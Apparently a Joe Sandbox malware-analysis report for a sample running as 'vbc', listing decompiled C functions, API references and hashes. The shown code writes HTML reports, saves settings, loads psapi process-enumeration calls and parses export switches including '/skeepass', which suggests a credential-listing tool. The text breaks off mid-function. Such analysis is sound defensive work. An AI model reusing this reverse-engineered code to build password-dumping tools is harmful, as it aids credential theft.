                                                              0x0040f1b5
                                                              0x0040f1b5
                                                              0x0040f1b8
                                                              0x0040f1be
                                                              0x0040f1da
                                                              0x0040f1e7
                                                              0x0040f1ec
                                                              0x0040f1f5
                                                              0x0040f1fb
                                                              0x0040f1ff
                                                              0x0040f207
                                                              0x0040f20d
                                                              0x0040f212
                                                              0x0040f21c
                                                              0x0040f224
                                                              0x0040f22a
                                                              0x0040f22e
                                                              0x0040f236
                                                              0x0040f23c
                                                              0x0040f242

                                                              APIs
                                                              • memset.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F15B
                                                              • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                              • sprintf.MSVCRT ref: 0040F1A3
                                                              • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                              • sprintf.MSVCRT ref: 0040F1DA
                                                              • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                              • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                              • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                              • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                              • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                              • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcat$memsetsprintf$strcpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 1662040868-1996832678
                                                              • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                              • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                              • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                              • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040AF17(void* __eax, intOrPtr _a4) {
                                                              				char _v271;
                                                              				char _v532;
                                                              				intOrPtr _v536;
                                                              				char _v540;
                                                              				void _v803;
                                                              				char _v804;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				char* _t47;
                                                              				intOrPtr _t67;
                                                              				WINDOWPLACEMENT* _t73;
                                                              				void* _t75;
                                                              				char* _t83;
                                                              				struct HWND__* _t84;
                                                              				intOrPtr _t88;
                                                              				int _t90;
                                                              
                                                              				_t75 = __eax;
                                                              				_v804 = 0;
                                                              				memset( &_v803, 0, 0x104);
                                                              				GetModuleFileNameA(0,  &_v804, 0x104);
                                                              				_t47 = strrchr( &_v804, 0x2e);
                                                              				if(_t47 != 0) {
                                                              					 *_t47 = 0;
                                                              				}
                                                              				strcat( &_v804, ".cfg");
                                                              				_v536 = _a4;
                                                              				_v540 = 0x413bdc;
                                                              				_v532 = 0;
                                                              				_v271 = 0;
                                                              				strcpy( &_v532,  &_v804);
                                                              				strcpy( &_v271, "General");
                                                              				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
                                                              				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
                                                              				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
                                                              				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
                                                              				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
                                                              				_t67 = _v536;
                                                              				_a4 = _t67;
                                                              				_t90 = 0x2c;
                                                              				if(_t67 != 0) {
                                                              					_t84 =  *(_t75 + 0x108);
                                                              					if(_t84 != 0) {
                                                              						_t73 = _t75 + 0x128;
                                                              						_t73->length = _t90;
                                                              						GetWindowPlacement(_t84, _t73);
                                                              					}
                                                              				}
                                                              				_t83 =  &_v540;
                                                              				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
                                                              				if(_a4 == 0) {
                                                              					E00401896(_t75);
                                                              				}
                                                              				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
                                                              			}



















                                                              0x0040af29
                                                              0x0040af35
                                                              0x0040af3c
                                                              0x0040af4d
                                                              0x0040af5c
                                                              0x0040af65
                                                              0x0040af67
                                                              0x0040af67
                                                              0x0040af76
                                                              0x0040af7e
                                                              0x0040af92
                                                              0x0040af9c
                                                              0x0040afa3
                                                              0x0040afaa
                                                              0x0040afbb
                                                              0x0040afc0
                                                              0x0040afdf
                                                              0x0040aff8
                                                              0x0040b011
                                                              0x0040b02a
                                                              0x0040b02d
                                                              0x0040b037
                                                              0x0040b03a
                                                              0x0040b03b
                                                              0x0040b03d
                                                              0x0040b045
                                                              0x0040b047
                                                              0x0040b04f
                                                              0x0040b051
                                                              0x0040b051
                                                              0x0040b045
                                                              0x0040b06a
                                                              0x0040b070
                                                              0x0040b076
                                                              0x0040b078
                                                              0x0040b078
                                                              0x0040b092

                                                              APIs
                                                              • memset.MSVCRT ref: 0040AF3C
                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                              • strrchr.MSVCRT ref: 0040AF5C
                                                              • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                              • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                              • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                              • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                              • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1301239246-2014360536
                                                              • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                              • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                              • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                              • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				void _v79;
                                                              				char _v80;
                                                              				void _v131;
                                                              				char _v132;
                                                              				void _v183;
                                                              				char _v184;
                                                              				char _v236;
                                                              				void _v491;
                                                              				char _v492;
                                                              				void* __edi;
                                                              				void* _t83;
                                                              				void* _t100;
                                                              				char* _t103;
                                                              				intOrPtr* _t120;
                                                              				signed int _t121;
                                                              				char _t139;
                                                              				signed int _t152;
                                                              				signed int _t153;
                                                              				signed int _t156;
                                                              				intOrPtr* _t157;
                                                              				void* _t158;
                                                              				void* _t160;
                                                              
                                                              				_t120 = __ebx;
                                                              				_v492 = 0;
                                                              				memset( &_v491, 0, 0xfe);
                                                              				_t121 = 0xc;
                                                              				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
                                                              				asm("movsb");
                                                              				_t156 = 0;
                                                              				_v132 = 0;
                                                              				memset( &_v131, 0, 0x31);
                                                              				_v184 = 0;
                                                              				memset( &_v183, 0, 0x31);
                                                              				_v80 = 0;
                                                              				memset( &_v79, 0, 0x31);
                                                              				_t160 = _t158 + 0x3c;
                                                              				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                                              				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                                              				if(_t83 != 0xffffffff) {
                                                              					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
                                                              					_t160 = _t160 + 0x14;
                                                              				}
                                                              				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
                                                              				_v8 = _t156;
                                                              				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
                                                              					while(1) {
                                                              						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
                                                              						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
                                                              							strcpy( &_v80, " nowrap");
                                                              						}
                                                              						_v28 = _v28 | 0xffffffff;
                                                              						_v24 = _v24 | 0xffffffff;
                                                              						_v20 = _v20 | 0xffffffff;
                                                              						_v16 = _t156;
                                                              						_t157 = _a8;
                                                              						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
                                                              						E0040F071(_v28,  &_v184);
                                                              						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
                                                              						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
                                                              						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
                                                              						_t153 = _t152 * 0x14;
                                                              						if(_t100 == 0xffffffff) {
                                                              							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
                                                              						} else {
                                                              							_push( *(_t153 + _v12 + 0x10));
                                                              							_push(E0040F071(_t100,  &_v492));
                                                              							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
                                                              							_t160 = _t160 + 0x10;
                                                              						}
                                                              						_t103 =  *(_t120 + 0x50);
                                                              						_t139 =  *_t103;
                                                              						if(_t139 == 0 || _t139 == 0x20) {
                                                              							strcat(_t103, "&nbsp;");
                                                              						}
                                                              						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
                                                              						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
                                                              						E00405EFD(_a4,  *(_t120 + 0x4c));
                                                              						_t160 = _t160 + 0x2c;
                                                              						_v8 = _v8 + 1;
                                                              						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
                                                              							goto L14;
                                                              						}
                                                              						_t156 = 0;
                                                              					}
                                                              				}
                                                              				L14:
                                                              				E00405EFD(_a4, "</table><p>");
                                                              				return E00405EFD(_a4, 0x412b1c);
                                                              			}































                                                              0x00409482
                                                              0x0040949b
                                                              0x004094a2
                                                              0x004094a9
                                                              0x004094b5
                                                              0x004094b7
                                                              0x004094ba
                                                              0x004094c1
                                                              0x004094c5
                                                              0x004094d4
                                                              0x004094db
                                                              0x004094e7
                                                              0x004094eb
                                                              0x004094f2
                                                              0x004094f7
                                                              0x00409503
                                                              0x00409506
                                                              0x0040951f
                                                              0x00409524
                                                              0x00409524
                                                              0x0040952f
                                                              0x00409539
                                                              0x0040953c
                                                              0x00409546
                                                              0x0040954c
                                                              0x0040955b
                                                              0x00409566
                                                              0x0040956c
                                                              0x0040956f
                                                              0x00409573
                                                              0x00409577
                                                              0x0040957f
                                                              0x00409582
                                                              0x0040958d
                                                              0x0040959a
                                                              0x004095ae
                                                              0x004095bc
                                                              0x004095c3
                                                              0x004095c6
                                                              0x004095cc
                                                              0x00409601
                                                              0x004095ce
                                                              0x004095d1
                                                              0x004095e4
                                                              0x004095ed
                                                              0x004095f2
                                                              0x004095f2
                                                              0x00409608
                                                              0x0040960b
                                                              0x0040960f
                                                              0x0040961c
                                                              0x00409622
                                                              0x0040962c
                                                              0x00409650
                                                              0x0040965b
                                                              0x00409660
                                                              0x00409663
                                                              0x0040966c
                                                              0x00000000
                                                              0x00000000
                                                              0x00409544
                                                              0x00409544
                                                              0x00409546
                                                              0x00409672
                                                              0x0040967a
                                                              0x00409692

                                                              APIs
                                                              • memset.MSVCRT ref: 004094A2
                                                              • memset.MSVCRT ref: 004094C5
                                                              • memset.MSVCRT ref: 004094DB
                                                              • memset.MSVCRT ref: 004094EB
                                                              • sprintf.MSVCRT ref: 0040951F
                                                              • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                              • sprintf.MSVCRT ref: 004095ED
                                                              • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                              • strcpy.MSVCRT(?,?), ref: 00409601
                                                              • sprintf.MSVCRT ref: 00409650
                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 2822972341-601624466
                                                              • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                              • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                              • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                              • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E00409EC4(void* __eax) {
                                                              				void* _v36;
                                                              				long _v40;
                                                              				void* _v44;
                                                              				void* _v56;
                                                              				long _t21;
                                                              				void* _t24;
                                                              				long _t26;
                                                              				long _t34;
                                                              				long _t37;
                                                              				intOrPtr* _t40;
                                                              				void* _t42;
                                                              				intOrPtr* _t44;
                                                              				void* _t47;
                                                              
                                                              				_t40 = ImageList_Create;
                                                              				_t47 = __eax;
                                                              				_t44 = __imp__ImageList_SetImageCount;
                                                              				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                                              					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                              					 *(_t47 + 0x18c) = _t37;
                                                              					 *_t44(_t37, 1);
                                                              					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                              				}
                                                              				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                              					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                              					 *(_t47 + 0x190) = _t34;
                                                              					 *_t44(_t34, 1);
                                                              					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                              				}
                                                              				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                              				 *(_t47 + 0x188) = _t21;
                                                              				 *_t44(_t21, 2);
                                                              				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                              				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                              				_t42 = _t24;
                                                              				 *_t44( *(_t47 + 0x188), 0);
                                                              				_t26 = GetSysColor(0xf);
                                                              				_v40 = _t26;
                                                              				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                              				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                              				DeleteObject(_v56);
                                                              				DeleteObject(_t42);
                                                              				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                              			}
















                                                              0x00409ec7
                                                              0x00409ed5
                                                              0x00409edf
                                                              0x00409ee5
                                                              0x00409ef1
                                                              0x00409ef6
                                                              0x00409efc
                                                              0x00409f11
                                                              0x00409f11
                                                              0x00409f1a
                                                              0x00409f26
                                                              0x00409f2b
                                                              0x00409f31
                                                              0x00409f46
                                                              0x00409f46
                                                              0x00409f52
                                                              0x00409f57
                                                              0x00409f5d
                                                              0x00409f93
                                                              0x00409f97
                                                              0x00409fa1
                                                              0x00409fa3
                                                              0x00409fa7
                                                              0x00409fb8
                                                              0x00409fc2
                                                              0x00409fcf
                                                              0x00409fdb
                                                              0x00409fde
                                                              0x0040a004

                                                              APIs
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                              • LoadImageA.USER32 ref: 00409F7B
                                                              • LoadImageA.USER32 ref: 00409F97
                                                              • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                              • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                              • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                              • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                              • DeleteObject.GDI32(?), ref: 00409FDB
                                                              • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                              • String ID:
                                                              • API String ID: 3411798969-0
                                                              • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                              • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                              • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                              • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E0040B841(signed int __eax, void* __esi) {
                                                              				void* _t5;
                                                              				void* _t6;
                                                              				void* _t7;
                                                              				void* _t8;
                                                              				void* _t9;
                                                              				void* _t10;
                                                              
                                                              				_push("/shtml");
                                                              				L004115B2();
                                                              				if(__eax != 0) {
                                                              					_push("/sverhtml");
                                                              					L004115B2();
                                                              					if(__eax != 0) {
                                                              						_push("/sxml");
                                                              						L004115B2();
                                                              						if(__eax != 0) {
                                                              							_push("/stab");
                                                              							L004115B2();
                                                              							if(__eax != 0) {
                                                              								_push("/scomma");
                                                              								L004115B2();
                                                              								if(__eax != 0) {
                                                              									_push("/stabular");
                                                              									L004115B2();
                                                              									if(__eax != 0) {
                                                              										_push("/skeepass");
                                                              										L004115C4();
                                                              										asm("sbb eax, eax");
                                                              										return ( ~__eax & 0xfffffff8) + 8;
                                                              									} else {
                                                              										_t5 = 3;
                                                              										return _t5;
                                                              									}
                                                              								} else {
                                                              									_t6 = 7;
                                                              									return _t6;
                                                              								}
                                                              							} else {
                                                              								_t7 = 2;
                                                              								return _t7;
                                                              							}
                                                              						} else {
                                                              							_t8 = 6;
                                                              							return _t8;
                                                              						}
                                                              					} else {
                                                              						_t9 = 5;
                                                              						return _t9;
                                                              					}
                                                              				} else {
                                                              					_t10 = 4;
                                                              					return _t10;
                                                              				}
                                                              			}









                                                              0x0040b842
                                                              0x0040b847
                                                              0x0040b850
                                                              0x0040b857
                                                              0x0040b85c
                                                              0x0040b865
                                                              0x0040b86c
                                                              0x0040b871
                                                              0x0040b87a
                                                              0x0040b881
                                                              0x0040b886
                                                              0x0040b88f
                                                              0x0040b896
                                                              0x0040b89b
                                                              0x0040b8a4
                                                              0x0040b8ab
                                                              0x0040b8b0
                                                              0x0040b8b9
                                                              0x0040b8c0
                                                              0x0040b8c5
                                                              0x0040b8cc
                                                              0x0040b8d6
                                                              0x0040b8bb
                                                              0x0040b8bd
                                                              0x0040b8be
                                                              0x0040b8be
                                                              0x0040b8a6
                                                              0x0040b8a8
                                                              0x0040b8a9
                                                              0x0040b8a9
                                                              0x0040b891
                                                              0x0040b893
                                                              0x0040b894
                                                              0x0040b894
                                                              0x0040b87c
                                                              0x0040b87e
                                                              0x0040b87f
                                                              0x0040b87f
                                                              0x0040b867
                                                              0x0040b869
                                                              0x0040b86a
                                                              0x0040b86a
                                                              0x0040b852
                                                              0x0040b854
                                                              0x0040b855
                                                              0x0040b855

                                                              APIs
                                                              • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                              • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _stricmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2884411883-1959339147
                                                              • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                              • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                              • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                              • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				void _v515;
                                                              				char _v516;
                                                              				void _v771;
                                                              				char _v772;
                                                              				void _v1027;
                                                              				char _v1028;
                                                              				char _v1284;
                                                              				char _v2308;
                                                              				char _t47;
                                                              				intOrPtr* _t50;
                                                              				void* _t57;
                                                              				intOrPtr* _t73;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              				void* _t78;
                                                              				void* _t79;
                                                              
                                                              				_v1028 = 0;
                                                              				memset( &_v1027, 0, 0xfe);
                                                              				_v772 = 0;
                                                              				memset( &_v771, 0, 0xfe);
                                                              				_v516 = 0;
                                                              				memset( &_v515, 0, 0xfe);
                                                              				_t77 = _t76 + 0x24;
                                                              				if(_a16 != 0xffffffff) {
                                                              					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
                                                              					_t77 = _t77 + 0x14;
                                                              				}
                                                              				if(_a20 != 0xffffffff) {
                                                              					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
                                                              					strcpy( &_v516, "</font>");
                                                              					_t77 = _t77 + 0x1c;
                                                              				}
                                                              				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
                                                              				E00405EFD(_a4,  &_v2308);
                                                              				_t47 = _a12;
                                                              				_t78 = _t77 + 0x14;
                                                              				if(_t47 > 0) {
                                                              					_t73 = _a8 + 4;
                                                              					_a16 = _t47;
                                                              					do {
                                                              						_v260 = 0;
                                                              						memset( &_v259, 0, 0xfe);
                                                              						_t50 =  *_t73;
                                                              						_t79 = _t78 + 0xc;
                                                              						if( *_t50 == 0) {
                                                              							_v260 = 0;
                                                              						} else {
                                                              							sprintf( &_v260, " width=\"%s\"", _t50);
                                                              							_t79 = _t79 + 0xc;
                                                              						}
                                                              						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
                                                              						_t57 = E00405EFD(_a4,  &_v2308);
                                                              						_t78 = _t79 + 0x20;
                                                              						_t73 = _t73 + 8;
                                                              						_t34 =  &_a16;
                                                              						 *_t34 = _a16 - 1;
                                                              					} while ( *_t34 != 0);
                                                              					return _t57;
                                                              				}
                                                              				return _t47;
                                                              			}





















                                                              0x0040f25e
                                                              0x0040f264
                                                              0x0040f272
                                                              0x0040f278
                                                              0x0040f286
                                                              0x0040f28c
                                                              0x0040f291
                                                              0x0040f298
                                                              0x0040f2b6
                                                              0x0040f2bb
                                                              0x0040f2bb
                                                              0x0040f2c2
                                                              0x0040f2e0
                                                              0x0040f2f1
                                                              0x0040f2f6
                                                              0x0040f2f6
                                                              0x0040f30c
                                                              0x0040f31b
                                                              0x0040f320
                                                              0x0040f323
                                                              0x0040f328
                                                              0x0040f332
                                                              0x0040f335
                                                              0x0040f338
                                                              0x0040f341
                                                              0x0040f347
                                                              0x0040f34c
                                                              0x0040f34e
                                                              0x0040f353
                                                              0x0040f36c
                                                              0x0040f355
                                                              0x0040f362
                                                              0x0040f367
                                                              0x0040f367
                                                              0x0040f396
                                                              0x0040f3a5
                                                              0x0040f3aa
                                                              0x0040f3ad
                                                              0x0040f3b0
                                                              0x0040f3b0
                                                              0x0040f3b0
                                                              0x00000000
                                                              0x0040f3b5
                                                              0x0040f3b9

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: sprintf$memset$strcpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 898937289-3842416460
                                                              • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                              • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                              • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                              • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040E0DA() {
                                                              				void* _t1;
                                                              				int _t2;
                                                              				struct HINSTANCE__* _t4;
                                                              
                                                              				if( *0x417518 != 0) {
                                                              					return _t1;
                                                              				}
                                                              				_t2 = LoadLibraryA("psapi.dll");
                                                              				_t4 = _t2;
                                                              				if(_t4 == 0) {
                                                              					L10:
                                                              					return _t2;
                                                              				} else {
                                                              					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
                                                              					 *0x416fec = _t2;
                                                              					if(_t2 != 0) {
                                                              						_t2 = GetProcAddress(_t4, "EnumProcessModules");
                                                              						 *0x416fe4 = _t2;
                                                              						if(_t2 != 0) {
                                                              							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
                                                              							 *0x416fdc = _t2;
                                                              							if(_t2 != 0) {
                                                              								_t2 = GetProcAddress(_t4, "EnumProcesses");
                                                              								 *0x41710c = _t2;
                                                              								if(_t2 != 0) {
                                                              									_t2 = GetProcAddress(_t4, "GetModuleInformation");
                                                              									 *0x416fe8 = _t2;
                                                              									if(_t2 != 0) {
                                                              										 *0x417518 = 1;
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					if( *0x417518 == 0) {
                                                              						_t2 = FreeLibrary(_t4);
